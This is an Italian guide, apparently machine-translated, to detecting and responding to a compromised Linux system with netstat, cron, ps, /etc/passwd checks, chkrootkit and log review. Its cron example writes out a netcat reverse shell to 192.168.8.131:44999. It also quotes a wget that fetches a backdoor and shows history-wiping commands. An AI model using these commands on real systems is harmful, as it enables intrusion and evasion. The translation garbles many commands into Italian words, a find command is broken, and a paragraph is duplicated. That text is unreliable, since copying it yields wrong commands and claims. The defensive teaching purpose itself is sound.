Come determinare se un sistema Linux è compromesso

Ci sono molte ragioni per cui un hacker si intrufola nel tuo sistema e ti causa seri problemi. Anni fa forse si trattava di mettere in mostra le proprie capacità, ma oggi le intenzioni dietro tali attività possono essere molto più complicate con conseguenze molto più ampie per la vittima. Può sembrare ovvio, ma solo perché "sembra tutto a posto", questo non significa che tutto vada bene. Gli hacker potrebbero penetrare nel tuo sistema senza farti sapere e infettarlo con malware per assumere il pieno controllo e persino per il movimento laterale tra i sistemi. Il malware può essere nascosto nel sistema e funge da backdoor o sistema di comando e controllo per consentire agli hacker di svolgere attività dannose sul tuo sistema.È meglio prevenire che curare. Potresti non renderti immediatamente conto che il tuo sistema è stato violato, ma ci sono alcuni modi in cui puoi determinare se il tuo sistema è compromesso. Questo articolo discuterà come determinare se il tuo Linux il sistema è stato compromesso da una persona non autorizzata o un bot sta accedendo al tuo sistema per svolgere attività dannose.

Netstat

Netstat è un'importante utility di rete TCP/IP da riga di comando che fornisce informazioni e statistiche sui protocolli in uso e sulle connessioni di rete attive.

Noi useremo netstat su una macchina vittima di esempio per verificare la presenza di qualcosa di sospetto nelle connessioni di rete attive tramite il seguente comando:

[e-mail protetta]:~$ netstat -antp

Qui, vedremo tutte le connessioni attualmente attive. Ora, cercheremo un connessione che non dovrebbe esserci.

Eccola, una connessione attiva su PORT 44999 (una porta che non dovrebbe essere aperta).Possiamo vedere altri dettagli sulla connessione, come il PID, e il nome del programma in esecuzione nell'ultima colonna. In questo caso, il PID è 1555 e il payload dannoso che sta eseguendo è il ./conchiglia.elfo file.

Un altro comando per verificare le porte attualmente in ascolto e attive sul tuo sistema è il seguente:

[email protected]:~$ netstat -la

Questo è un output piuttosto disordinato. Per filtrare le connessioni in ascolto e stabilite, utilizzeremo il seguente comando:

[email protected]:~$ netstat -la | grep “ASCOLTA” “STABILITO”

Questo ti darà solo i risultati che ti interessano, in modo che tu possa ordinare questi risultati più facilmente. Possiamo vedere una connessione attiva su porta 44999 nei risultati di cui sopra.

Dopo aver riconosciuto il processo dannoso, puoi terminare il processo tramite i seguenti comandi. Prenderemo nota del PID del processo utilizzando il comando netstat e terminare il processo tramite il seguente comando:

[email protected]:~$ kill 1555

~.bash-storia

Linux tiene traccia di quali utenti hanno effettuato l'accesso al sistema, da quale IP, quando e per quanto tempo.

Puoi accedere a queste informazioni con il scorso comando. L'output di questo comando sarà il seguente:

[email protected]:~$ last

L'output mostra il nome utente nella prima colonna, il Terminale nella seconda, l'indirizzo di origine nella terza, il tempo di accesso nella quarta colonna e il tempo totale della sessione registrato nell'ultima colonna. In questo caso, gli utenti usman e ubuntu sono ancora connessi. Se vedi una sessione non autorizzata o che sembra dannosa, fai riferimento all'ultima sezione di questo articolo.

La cronologia di registrazione è memorizzata in ~.bash-storia file. Quindi, la cronologia può essere rimossa facilmente eliminando il .bash-storia file. Questa azione viene spesso eseguita dagli aggressori per coprire le proprie tracce.

[email protected]:~$ cat .bash_history

Questo comando mostrerà i comandi eseguiti sul tuo sistema, con l'ultimo comando eseguito in fondo all'elenco.

La cronologia può essere cancellata tramite il seguente comando:

[email protected]:~$ history -c

Questo comando eliminerà solo la cronologia dal terminale che stai attualmente utilizzando. Quindi, c'è un modo più corretto per farlo:

[email protected]:~$ cat /dev/null > ~/.bash_history

Questo cancellerà il contenuto della cronologia ma manterrà il file in posizione. Quindi, se visualizzi solo il tuo login attuale dopo aver eseguito il scorso comando, questo non è affatto un buon segno. Questo indica che il tuo sistema potrebbe essere stato compromesso e che l'attaccante probabilmente ha cancellato la cronologia.

Se sospetti un utente o un IP dannoso, accedi come quell'utente ed esegui il comando storia, come segue:

[e-mail protetta]:~$ su
[email protected]:~$ cronologia

Questo comando mostrerà la cronologia dei comandi leggendo il file .bash-storia nel /casa cartella di quell'utente. Cerca con attenzione wget, arricciare, o netcat comandi, nel caso in cui l'attaccante abbia utilizzato questi comandi per trasferire file o per installare strumenti di repository, come crypto-miner o spam bot.

Dai un'occhiata all'esempio qui sotto:

Sopra, puoi vedere il comando “wget https://github.com/sajith/mod-rootme." In questo comando, l'hacker ha tentato di accedere a un file di repository utilizzando wget per scaricare una backdoor chiamata "mod-root me" e installarla sul tuo sistema. Questo comando nella cronologia significa che il sistema è compromesso ed è stato sottoposto a backdoor da un utente malintenzionato.

Ricorda, questo file può essere facilmente espulso o la sua sostanza prodotta. I dati forniti da questo comando non devono essere presi come una realtà definita. Tuttavia, nel caso in cui l'attaccante abbia eseguito un comando "cattivo" e abbia trascurato di evacuare la cronologia, sarà lì.

Cron Jobs

I lavori Cron possono fungere da strumento vitale se configurati per impostare una shell inversa sulla macchina dell'attaccante. Modificare i lavori cron è un'abilità importante, così come sapere come visualizzarli.

Per visualizzare i lavori cron in esecuzione per l'utente corrente, utilizzeremo il seguente comando:

[email protected]:~$ crontab -l

Per visualizzare i lavori cron in esecuzione per un altro utente (in questo caso, Ubuntu), utilizzeremo il seguente comando:

[email protected]:~$ crontab -u ubuntu -l

Per visualizzare i cron job giornalieri, orari, settimanali e mensili, utilizzeremo i seguenti comandi:

Lavori Cron giornalieri:

[e-mail protetta]:~$ ls -la /etc/cron.quotidiano

Lavori Cron orari:

[e-mail protetta]:~$ ls -la /etc/cron.ogni ora

Lavori Cron settimanali:

[e-mail protetta]:~$ ls -la /etc/cron.settimanalmente

Prendi un esempio:

L'attaccante può inserire un cron job in /etc/crontab che esegue un comando dannoso 10 minuti dopo ogni ora. L'attaccante può anche eseguire un servizio dannoso o una backdoor di shell inversa tramite netcat o qualche altra utilità. Quando esegui il comando $~ crontab -l, vedrai un cron job in esecuzione sotto:

[email protetta]:~$ crontab -l
CT=$(crontab -l)
CT=$CT$'\n10 * * * * nc -e /bin/bash 192.168.8.131 44999'
printf "$CT" | crontab -
ps ausiliario

Per verificare correttamente se il tuo sistema è stato compromesso, è anche importante visualizzare i processi in esecuzione. Ci sono casi in cui alcuni processi non autorizzati non consumano abbastanza utilizzo della CPU per essere elencati nel in superiore comando. Ecco dove useremo il ps comando per mostrare tutti i processi attualmente in esecuzione.

[email protected]:~$ ps auxf

La prima colonna mostra l'utente, la seconda colonna mostra un ID processo univoco e l'utilizzo della CPU e della memoria è mostrato nelle colonne successive.

Questa tabella ti fornirà la maggior parte delle informazioni. Dovresti ispezionare ogni processo in esecuzione per cercare qualcosa di particolare per sapere se il sistema è compromesso o meno. Nel caso in cui trovi qualcosa di sospetto, cercalo su Google o eseguilo con il lsof comando, come mostrato sopra. Questa è una buona abitudine per correre ps comandi sul tuo server e aumenterà le tue possibilità di trovare qualcosa di sospetto o fuori dalla tua routine quotidiana.

/etc/passwd

Il /etc/passwd il file tiene traccia di ogni utente nel sistema. Questo è un file separato da due punti contenente informazioni come nome utente, ID utente, password crittografata, ID gruppo (GID), nome completo dell'utente, directory home dell'utente e shell di accesso.

Se un utente malintenzionato entra nel tuo sistema, c'è la possibilità che crei altri utenti, per mantenere le cose separate o per creare una backdoor nel tuo sistema per tornare usando quella backdoor. Mentre controlli se il tuo sistema è stato compromesso, dovresti anche verificare ogni utente nel file /etc/passwd. Digita il seguente comando per farlo:

[email protected]:~$ cat etc/passwd

Questo comando ti darà un output simile a quello qui sotto:

gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:amministratore di PostgreSQL,,,:/var/lib/postgresql:/bin/bash
debian-tor:x:123:129::/var/lib/tor:/bin/false
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
lightdm:x:125:132:Light Display Manager:/var/lib/lightdm:/bin/false
Debian-gdm:x:124:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
anonimo:x:1002:1002:,,,:/home/anonimo:/bin/bash

Ora vorrai cercare qualsiasi utente di cui non sei a conoscenza. In questo esempio, puoi vedere un utente nel file denominato "anonimo." Un'altra cosa importante da notare è che se l'attaccante ha creato un utente con cui accedere nuovamente, all'utente verrà assegnata anche una shell "/bin/bash". Quindi, puoi restringere la tua ricerca greppando il seguente output:

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash"
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:amministratore di PostgreSQL,,,:/var/lib/postgresql:/bin/bash
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
anonimo:x:1002:1002:,,,:/home/anonimo:/bin/bash

Puoi eseguire ulteriori "bash magic" per perfezionare il tuo output.

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash" | taglia -d ":" -f 1
usman
postgres
ubuntu
anonimo

Trova

Le ricerche basate sul tempo sono utili per un rapido triage. L'utente può anche modificare i timestamp di modifica dei file. Per migliorare l'affidabilità, includi ctime nei criteri, poiché è molto più difficile da manomettere perché richiede modifiche di alcuni file di livello.

Puoi utilizzare il seguente comando per trovare i file creati e modificati negli ultimi 5 giorni:

[email protected]:~$ find / -mtime -o -ctime -5

Per trovare tutti i file SUID di proprietà del root e per verificare se ci sono voci impreviste negli elenchi, utilizzeremo il seguente comando:

[email protected]:~$ find / -perm -4000 -user root -type f

Per trovare tutti i file SGID (set user ID) di proprietà della root e controllare se ci sono voci impreviste negli elenchi, utilizzeremo il seguente comando:

[email protected]:~$ find / -perm -6000 -type f

Chkrootkit

Rootkit sono una delle cose peggiori che possono capitare a un sistema e sono uno degli attacchi più pericolosi, più pericolosi di malware e virus, sia per i danni che provocano al sistema sia per la difficoltà nel trovarli e rilevarli.

Sono progettati in modo tale da rimanere nascosti e compiere azioni dannose come rubare carte di credito e informazioni bancarie online. Rootkit dai ai criminali informatici la possibilità di controllare il tuo sistema informatico. I rootkit aiutano anche l'attaccante a monitorare i tuoi tasti premuti e disabilitare il tuo software antivirus, il che rende ancora più facile rubare le tue informazioni private.

Questi tipi di malware possono rimanere sul tuo sistema per molto tempo senza che l'utente se ne accorga e possono causare seri danni. una volta che Rootkit viene rilevato, non c'è altro modo che reinstallare l'intero sistema. A volte questi attacchi possono persino causare guasti hardware.

Fortunatamente, ci sono alcuni strumenti che possono aiutare a rilevare Rootkit su sistemi Linux, come Lynis, Clam AV o LMD (Linux Malware Detect). Puoi controllare il tuo sistema per sapere Rootkit usando i comandi qui sotto.

Innanzitutto, installa Chkrootkit tramite il seguente comando:

[email protected]:~$ sudo apt install chkrootkit

Questo installerà il Chkrootkit attrezzo. Puoi utilizzare questo strumento per verificare la presenza di Rootkit tramite il seguente comando:

[email protected]:~$ sudo chkrootkit

Il pacchetto Chkrootkit consiste in uno script di shell che controlla i binari di sistema per la modifica del rootkit, così come diversi programmi che controllano vari problemi di sicurezza. Nel caso precedente, il pacchetto ha verificato la presenza di un segno di Rootkit sul sistema e non ne ha trovati. Bene, questo è un buon segno!

Registri Linux

I log di Linux forniscono un calendario degli eventi sul framework e sulle applicazioni di lavoro di Linux e sono un importante strumento di indagine quando si verificano problemi. L'attività principale che un amministratore deve eseguire quando scopre che il sistema è compromesso dovrebbe essere l'analisi di tutti i record di registro.

Per problemi espliciti relativi all'applicazione dell'area di lavoro, i registri vengono tenuti in contatto con varie aree. Ad esempio, Chrome compone rapporti sugli arresti anomali per '~/.chrome/Rapporto sugli arresti anomali'), dove un'applicazione dell'area di lavoro compone i registri in base al tecnico e mostra se l'applicazione tiene conto della disposizione dei registri personalizzata custom. I record sono nel/var/log directory. Ci sono log Linux per tutto: framework, porzione, bundle chief, moduli di avvio, Xorg, Apache e MySQL. In questo articolo, il tema si concentrerà esplicitamente sui log del framework Linux.

È possibile passare a questo catalogo utilizzando l'ordine del compact disc. Dovresti avere i permessi di root per visualizzare o modificare i file di registro.

[e-mail protetta]:~$ cd /var/log

Istruzioni per visualizzare i log di Linux

Utilizzare i seguenti comandi per visualizzare i documenti di registro necessari.

I log di Linux possono essere visualizzati con il comando cd /var/log, a quel punto componendo l'ordine per vedere i log riposti sotto questo catalogo. Uno dei registri più significativi è il syslog, che registra molti registri importanti.

ubuntu@ubuntu: cat syslog

Per disinfettare l'output, utilizzeremo il "Di meno" comando.

ubuntu@ubuntu: syslog del gatto | Di meno

Digita il comando var/log/syslog per vedere alcune cose sotto il file sysloglog. Concentrarsi su un particolare problema richiederà del tempo, poiché questo record sarà solitamente lungo will. Premi Maiusc+G per scorrere verso il basso nel record fino a FINE, indicato da "FINE"."

Puoi anche vedere i registri tramite dmesg, che stampa il supporto dell'anello parziale. Questa funzione stampa tutto e ti invia il più lontano possibile lungo il documento. Da quel momento, puoi utilizzare l'ordine dmesg | Di meno per guardare attraverso il rendimento. Nel caso in cui tu abbia bisogno di vedere i log per un dato utente, dovrai eseguire il seguente comando:

dmesg - facility=utente

In conclusione, puoi utilizzare l'ordine di coda per vedere i documenti di registro. È un'utilità piccola ma utile che si può usare, in quanto viene utilizzata per mostrare l'ultima parte dei registri, dove si è verificato il problema più probabilmente. Puoi anche specificare il numero di ultimi byte o righe da mostrare nel comando tail. Per questo, usa il comando tail /var/log/syslog. Ci sono molti modi per guardare i log.

Per un determinato numero di righe (il modello considera le ultime 5 righe), inserisci il seguente comando:

[email protected]:~$ tail -f -n 5 /var/log/syslog

Questo stamperà le ultime 5 righe. Quando arriverà un'altra linea, la prima verrà evacuata. Per allontanarti dall'ordine di coda, premi Ctrl+X.

Registri importanti di Linux

I quattro registri principali di Linux includono:

Registri dell'applicazione
Registri eventi
Registri di servizio
Registri di sistema

ubuntu@ubuntu: syslog del gatto | Di meno

/var/log/syslog o /var/log/messaggi: messaggi generali, così come i dati relativi al framework. Questo registro memorizza tutte le informazioni sull'azione nel framework mondiale.

ubuntu@ubuntu: cat auth.registro | Di meno

/var/log/auth.log o /var/log/secure: memorizzare i registri di verifica, inclusi accessi efficaci e non riusciti e strategie di convalida. Uso di Debian e Ubuntu /var/log/auth.log per memorizzare i tentativi di accesso, mentre Redhat e CentOS utilizzano /var/log/secure per memorizzare i log di autenticazione.

ubuntu@ubuntu: stivale da gatto.registro | Di meno

/var/log/boot.log: contiene informazioni sull'avvio e messaggi durante l'avvio.

ubuntu@ubuntu: maillog del gatto | Di meno

/var/log/maillog o /var/log/mail.registro: memorizza tutti i log identificati con i server di posta; prezioso quando hai bisogno di dati su postfix, smtpd o qualsiasi amministrazione relativa alla posta elettronica in esecuzione sul tuo server.

ubuntu@ubuntu: gatto kern | Di meno

/var/log/kern: contiene informazioni sui log del kernel. Questo registro è importante per indagare su porzioni personalizzate.

ubuntu@ubuntu: cat dmesg | Di meno

/var/log/dmesg: contiene messaggi che identificano i driver del gadget. L'ordine dmesg può essere utilizzato per vedere i messaggi in questo record.

ubuntu@ubuntu: registro errori gatto | Di meno

/var/log/faillog: contiene i dati su tutti i tentativi di accesso falliti, utili per raccogliere bit di conoscenza sui tentativi di penetrazione della sicurezza; ad esempio, coloro che cercano di violare le certificazioni di accesso, proprio come gli attacchi di potere animale.

ubuntu@ubuntu: cat cron | Di meno

/var/log/cron: memorizza tutti i messaggi relativi a Cron; impieghi cron, ad esempio, o quando il demone cron ha iniziato una vocazione, relativi messaggi di delusione e così via.

ubuntu@ubuntu: gatto yum.registro | Di meno

/var/log/yum.log: nel caso in cui si introducano bundle utilizzando l'ordine yum, questo registro memorizza tutti i dati correlati, che possono essere utili per decidere se un bundle e tutti i segmenti sono stati effettivamente introdotti.

ubuntu@ubuntu: gatto httpd | Di meno

/var/log/httpd/ o /var/log/apache2: queste due directory vengono utilizzate per memorizzare tutti i tipi di log per un server HTTP Apache, inclusi i log di accesso e i log di errore. Il file error_log contiene tutte le richieste errate ricevute dal server http. Questi errori includono problemi di memoria e altri errori relativi al framework. L'access_log contiene un record di tutte le sollecitazioni ricevute tramite HTTP.

ubuntu@ubuntu: gatto mysqld.registro | Di meno

/var/log/mysqld.log o/var/log/mysql.log : il documento di log di MySQL che registra tutti i messaggi di errore, debug e successo. Questa è un'altra occorrenza in cui il framework indirizza al registro; RedHat, CentOS, Fedora e altri framework basati su RedHat usano/var/log/mysqld.log, mentre Debian/Ubuntu utilizza /var/log/mysql.catalogo dei registri.

Strumenti per visualizzare i log di Linux

Oggi sono disponibili molti tracker di log open source e dispositivi di esame, che rendono la scelta delle risorse corrette per i log delle azioni più semplice di quanto si possa sospettare. I correttori di log gratuiti e open source possono funzionare su qualsiasi sistema per portare a termine il lavoro. Ecco cinque dei migliori che ho utilizzato in passato, senza un ordine specifico.

GREYLOG

Avviato in Germania nel 2011, Graylog è ora offerto come dispositivo open source o come accordo commerciale. Graylog è concepito per essere un framework integrato e log-the-board che riceve flussi di informazioni da diversi server o endpoint e consente di esaminare rapidamente o abbattere tali dati.

Graylog ha accumulato una notorietà positiva tra le teste dei framework grazie alla sua semplicità e versatilità. La maggior parte delle iniziative web inizia poco, ma può svilupparsi in modo esponenziale. Graylog può regolare gli stack su un sistema di server di backend e gestire alcuni terabyte di informazioni di registro ogni giorno.

I presidenti IT vedranno il front-end dell'interfaccia GrayLog semplice da utilizzare e vigoroso nella sua utilità. Graylog lavora attorno all'idea di dashboard, che consente agli utenti di scegliere il tipo di misurazioni o fonti di informazioni che ritengono importanti e osservare rapidamente le pendenze dopo un po' di tempo.

Quando si verifica un episodio di sicurezza o di esecuzione, i presidenti IT devono avere la possibilità di seguire le manifestazioni a un driver sottostante il più rapidamente possibile. La funzione di ricerca di Graylog semplifica questo compito. Questo strumento ha funzionato per adattarsi al fallimento interno che può eseguire iniziative a più corde in modo da poter abbattere alcuni potenziali pericoli insieme.

NAGIOS

Avviato da un singolo sviluppatore nel 1999, Nagios da allora è diventato uno dei più solidi strumenti open source per la supervisione delle informazioni di registro. L'attuale versione di Nagios può essere implementata in server che eseguono qualsiasi tipo di sistema operativo (Linux, Windows, ecc.).

L'elemento essenziale di Nagios è un server di log, che semplifica l'assortimento di informazioni e rende i dati progressivamente disponibili ai quadri dirigenti framework. Il motore del server di log Nagios catturerà le informazioni gradualmente e le inserirà in uno strumento di ricerca innovativo ground. L'integrazione con un altro endpoint o applicazione è una semplice gratuità per questa procedura guidata di disposizione intrinseca.

Nagios è spesso utilizzato in associazioni che hanno bisogno di controllare la sicurezza dei loro quartieri e possono esaminare una serie di occasioni relative al sistema per aiutare a automatizzare la trasmissione delle avvertenze. Nagios può essere programmato per eseguire attività specifiche quando viene soddisfatta una determinata condizione, il che consente agli utenti di rilevare i problemi anche prima che vengano incluse le esigenze di un essere umano.

Come aspetto importante della valutazione del sistema, Nagios canalizzerà le informazioni di registro in base all'area geografica in cui inizia. Dashboard complete con innovazione di mappatura possono essere implementate per vedere lo streaming del traffico web.

LOGALIZZA

Logalyze produce strumenti open source per direttori di framework o amministratori di sistema e specialisti della sicurezza per assisterli nella supervisione dei log del server e consentire loro di concentrarsi sulla trasformazione dei log in informazioni preziose. L'elemento essenziale di questo strumento è che è accessibile come download gratuito per uso domestico o aziendale.

L'elemento essenziale di Nagios è un server di registro, che semplifica l'assortimento di informazioni e rende i dati progressivamente disponibili ai dirigenti della struttura. Il motore del server di log Nagios catturerà le informazioni gradualmente e le inserirà in uno strumento di ricerca innovativo ground. L'integrazione con un altro endpoint o applicazione è una semplice gratuità per questa procedura guidata di disposizione intrinseca.

Cosa dovresti fare se sei stato compromesso?

La cosa principale è non farsi prendere dal panico, in particolare se la persona non autorizzata ha effettuato l'accesso in questo momento. Dovresti avere la possibilità di riprendere il controllo della macchina prima che l'altra persona sappia che ne sei a conoscenza. Nel caso in cui sappiano che sei consapevole della loro presenza, l'attaccante potrebbe tenerti fuori dal tuo server e iniziare a distruggere il tuo sistema. Se non sei così tecnico, tutto ciò che devi fare è spegnere immediatamente l'intero server. Puoi spegnere il server tramite i seguenti comandi:

[email protected]:~$ shutdown -h now

[email protected]:~$ systemctl poweroff

Un altro modo per farlo è accedere al pannello di controllo del tuo provider di hosting e chiuderlo da lì. Una volta che il server è spento, puoi lavorare sulle regole del firewall necessarie e consultare chiunque per assistenza nel tuo tempo libero.

Nel caso in cui ti senti più sicuro e il tuo provider di hosting ha un firewall upstream, crea e abilita le seguenti due regole:

Consenti traffico SSH solo dal tuo indirizzo IP.
Blocca tutto il resto, non solo SSH ma ogni protocollo in esecuzione su ogni porta.

Per verificare la presenza di sessioni SSH attive, utilizzare il seguente comando:

[e-mail protetta]:~$ ss | grep ssh

Usa il seguente comando per terminare la loro sessione SSH:

[email protected]:~$ kill

Questo interromperà la loro sessione SSH e ti darà accesso al server. Nel caso in cui non si abbia accesso a un firewall upstream, sarà necessario creare e abilitare le regole del firewall sul server stesso. Quindi, quando le regole del firewall sono impostate, termina la sessione SSH dell'utente non autorizzato tramite il comando "kill".

Un'ultima tecnica, ove disponibile, accedere al server tramite una connessione fuori banda, come una console seriale. Interrompi tutte le reti tramite il seguente comando:

[email protected]:~$ systemctl ferma rete.servizio

Questo impedirà completamente a qualsiasi sistema di raggiungerti, quindi ora sarai in grado di abilitare i controlli del firewall nel tuo tempo libero.

Una volta ripreso il controllo del server, non fidarti facilmente di esso. Non cercare di sistemare le cose e riutilizzarle. Ciò che è rotto non può essere riparato. Non sapresti mai cosa potrebbe fare un utente malintenzionato, quindi non dovresti mai essere sicuro che il server sia sicuro. Quindi, la reinstallazione dovrebbe essere il tuo passaggio finale.